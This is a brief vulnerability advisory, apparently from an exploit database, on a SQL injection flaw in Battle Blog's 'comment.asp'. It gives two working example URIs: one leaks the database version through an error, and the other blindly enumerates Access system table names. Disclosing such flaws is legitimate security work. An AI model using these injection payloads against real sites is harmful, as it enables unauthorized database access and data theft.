• info
• discussion
• exploit
• solution
• references

Battle Blog 'comment.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/comment.asp?entry=22+and+1=convert(int,(select+@@version))--
http://www.example.com/comment.asp?entry=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00